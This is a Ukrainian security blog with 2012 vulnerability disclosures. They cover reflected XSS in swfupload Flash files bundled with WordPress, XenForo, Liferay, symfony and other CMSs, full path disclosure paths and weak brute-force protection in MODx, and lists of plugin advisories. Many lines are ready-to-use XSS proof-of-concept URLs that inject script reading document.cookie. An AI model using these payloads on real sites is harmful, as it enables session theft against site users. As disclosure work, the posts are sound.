Websecurity - Веб безпека

Цього року я вже писав про численні уразливості в Akismet для WordPress. Він є core-плагіном (починаючи з версії WP 2.0), тому ці уразливості також стосуються самого WordPress. А в жовтні були виявлені та оприлюднені дві Cross-Site Scripting уразливості в Akismet. Які стосуються невідомої версії плагіна (потенційно останньої версії). Вони були знайдені Nafsh.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

XSS:

В плагіні в скрипті legacy.php через параметр s та в скрипті admin.php через параметр url можна проводити XSS атаки. При цьому обходячи існуючі захисні фільтри.

• WordPress Akismet Cross Site Scripting (http://packetstormsecurity.org/files/117063/WordPress-Akismet-Cross-Site-Scripting.html)

При цьому автор зазначає, що атака відбувається при відправленні POST запитів до legacy.php і admin.php. Але при зверненні до цих скриптів (будь то GET чи POST запит), виводиться повідомлення про помилку (з FPD, про які я писав раніше). І автор наводить експлоіт для XSS в legacy.php - ясна річ неробочий (з вищенаведеної причини). Тому дані уразливості викликають сумніви, як враховуючи те, що атакуючі запити потрібно посилати іншим скриптам, так і наявність фільтрації вказаних параметрів (явно фейкові дірки).

Уразливі WordPress 3.x та попередні версії, що постачаються з вразливими версіями Akismet.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах AJAX post Search, FoxyPress та Spider WordPress. Для котрих з’явилися експлоіти. AJAX post Search - це пошуковий плагін, FoxyPress - це e-commerce плагін для створення онлайн-магазина, Spider WordPress - це плагін для створення каталогу продуктів.

• Sql injection in AJAX post Search wordpress plugin (деталі)
• WordPress FoxyPress 0.4.2.5 XSS / CSRF / SQL Injection (деталі)
• WordPress Catalog HTML Injection / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Cisco Application Control Engine Administrator IP Address Overlap Vulnerability (деталі)
• XSS Vulnerabilities in ClipBucket (деталі)
• VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities (деталі)
• Smf 2.0.2 Cross-Site Scripting Vulnerability (деталі)
• McAfee SmartFilter Administration Server SFAdminSrv.exe JBoss RMI Remote Code Execution Vulnerabilty (деталі)
• Inventory 1.0 Multiple SQL Vulnerabilities (деталі)
• Inventory 1.0 Multiple XSS Vulnerabilities (деталі)
• viewvc security update (деталі)
• Vulnerability in apache-mod_auth_openid (деталі)
• Layton Helpbox 4.4.0 Multiple Security Issues (деталі)

Раніше я писав про XSS уразливість в AionWeb, ExpressionEngine, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload.swf і swfupload_f9.swf (які призначені для Flash Player 10 та Flash Player 9), то зараз я напишу про веб додатки з swfupload_f8.swf, який призначений для Flash Player 8. Зокрема я виявив дану Cross-Site Scripting уразливість в Archiv plugin для TinyMCE, Squeeze Documents для SPIP, Upload Manager для Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail та symfony - серед багатьох веб додатків, що постачаються з swfupload_f8.swf.

XSS:

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Squeeze Documents для SPIP:

http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Upload Manager для Radiant CMS:

http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В symfony окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

Уразливі потенційно всі версії Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

27.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Brute Force та Full path disclosure. Це перша порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Tagcloud для MODx CMS та JWPlayer для MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.11.2012

Brute Force (WASC-11):

В формі логіна (http://site/manager/) немає надійного захисту від Brute Force атак.

При цьому зустрічаються сайти, де є такий захист як блокування після багатьох невдалих спроб логіну. Але цей захист неефективний - пароль може бути підібраний ще до спрацювання блокування (як це було під час мого пентесту), блокування працює короткий час і воно працює лише для конкретного акаунту, тобто можна підбирати паролі для інших незаблокованих акаунтів.

Full path disclosure (WASC-13):

http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/ckeditor/read_config.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
http://site/assets/plugins/phx/modifiers/parent.phx.php
http://site/assets/snippets/ditto/classes/debug.class.inc.php
http://site/assets/snippets/ditto/extenders/tagging.extender.inc.php
http://site/assets/snippets/ditto/formats/atom.format.inc.php
http://site/assets/snippets/ditto/formats/json.format.inc.php
http://site/assets/snippets/ditto/formats/rss.format.inc.php
http://site/assets/snippets/ditto/formats/xml.format.inc.php
http://site/manager/includes/browsercheck.inc.php
http://site/manager/includes/mutate_settings.ajax.php
http://site/manager/includes/rss.inc.php
http://site/manager/includes/extenders/getUserData.extender.php
http://site/manager/includes/sniff/phpSniff.class.php
http://site/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

Деякі з FPD відносяться до движка, а деякі до плагінів для нього.

Уразливі MODx 1.0.6 та попередні версії.

В даній добірці уразливості в веб додатках:

• Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion (деталі)
• SilverStripe CMS 2.4.7 <= Arbitrary URL Redirection (деталі)
• SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability (деталі)
• ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities (деталі)
• Off-by-one error in libxml2 (деталі)
• Knowledge Base EE v4.62.0 - SQL Injection Vulnerability (деталі)
• Multiple vulnerabilities in Ezylog photovoltaic management server (деталі)
• XSS Vulnerabilities in TaskFreak (деталі)
• Microsoft Security Bulletin MS12-058 - Critical Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (деталі)
• XSS Vulnerabilities in CMSMini (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах My Question, A/B Test та Easy Webinar. Для котрих з’явилися експлоіти. My Question - це плагін для створення опитувань, A/B Test - це плагін для A/B тестування, Easy Webinar - це плагін для створення онлайн-семінарів.

• XSS in answer my question plugin (деталі)
• WordPress Abtest Directory Traversal (деталі)
• WordPress Easy Webinar Blind SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

15.11.2012

Раніше я писав про XSS уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередньому записі я писав про веб додатки з swfupload.swf (який призначений для Flash Player 10), то зараз я напишу про веб додатки з swfupload_f9.swf (який призначений для Flash Player 9). Зокрема я виявив дану Cross-Site Scripting уразливість в AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony - серед багатьох веб додатків, що постачаються з swfupload_f9.swf.

XSS:

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/engine/classes/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

ExpressionEngine:

http://site/cms/themes/cp_themes/default/images/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

06.12.2012

Замінив Magento на ExpressionEngine, т.к. я виявив, що уразливим є саме цей движок. На сайті, де я знайшов флешку, був встановлений Magento. Але сьогодні я виявив, що на цьому сайті також встановлений EE, а також EE використовується на інших сайтах з аналогічною темою (в якій знаходиться swf-файл).

Раніше я писав про XSS уразливість в swfupload в WordPress і ця дірка має місце в багатьох інших веб додатках.

Зокрема я виявив дану Cross-Site Scripting уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin - серед багатьох веб додатків, що постачаються з swfupload.swf.

XSS:

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// 

Уразливі потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Уразливі версії XenForo 1.0.0 - 1.1.2. В XenForo 1.1.3 дана уразливість була виправлена і випущений патч для попередніх версій (ще 19.06.2012).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

В квітні була анонсована Cross-Site Scripting уразливість в swfupload.swf в WordPress (CVE-2012-3414). Яка була виправлена в WordPress 3.3.2. Але на той час про неї не було жодної детальної інформації. Ця дірка була знайдена Neal Poole і Nathan Partlan. І 17.05.2012 Ніл оприлюднив її в себе на сайті.

На початку місяця я звернув увагу, що почали з’являтися нові описи XSS дірки в swfupload.swf в інших веб додатках. Як у плагіні WordPress Shopp, де я її знайшов. З чого стало зрозумілим, що деталі цієї уразливості вже були оприлюднені.

Після чого я зробив дослідження і виявив різні версії swf-файла (з різними іменами) та всі версії WordPress, що містять будь-які з цих swf-файлів. Тобто не одна флешка (згадана Нілом), а дві флешки з різними іменами мають цю XSS. Це лише в WP, бо існують версії цієї флешки ще з іншими іменами в інших веб додатках, про що я розповім окремо.

XSS:

http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.7-3.3.1.

http://site/wp-includes/js/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.5-2.7.1.

20.04.2012 в WordPress 3.3.2 дана уразливість була виправлена. Розробники WP випустили оновлену версію флешки, яку могли використати всі веб розробники, що використовують swfupload.

Уразливі версії WordPress 2.5 - 3.3.1.

Файл swfupload.swf постачається з WordPress 2.7 - 3.3.1.

Файл swfupload_f9.swf постачається з WordPress 2.5 - 2.7.1.

У версіях WP 2.7 - 2.7.1 присутні обидві флешки.

Swfupload використовується в WordPress, в плагінах до нього та в інших веб додатках. Уразливість в swfupload - це дірка “мільйонник”. Тільки в одному WP вона була поширена на десятках мільйонах сайтів (за статистикою wordpress.com, зараз в світі більше 57,5 мільйонів сайтів на WP).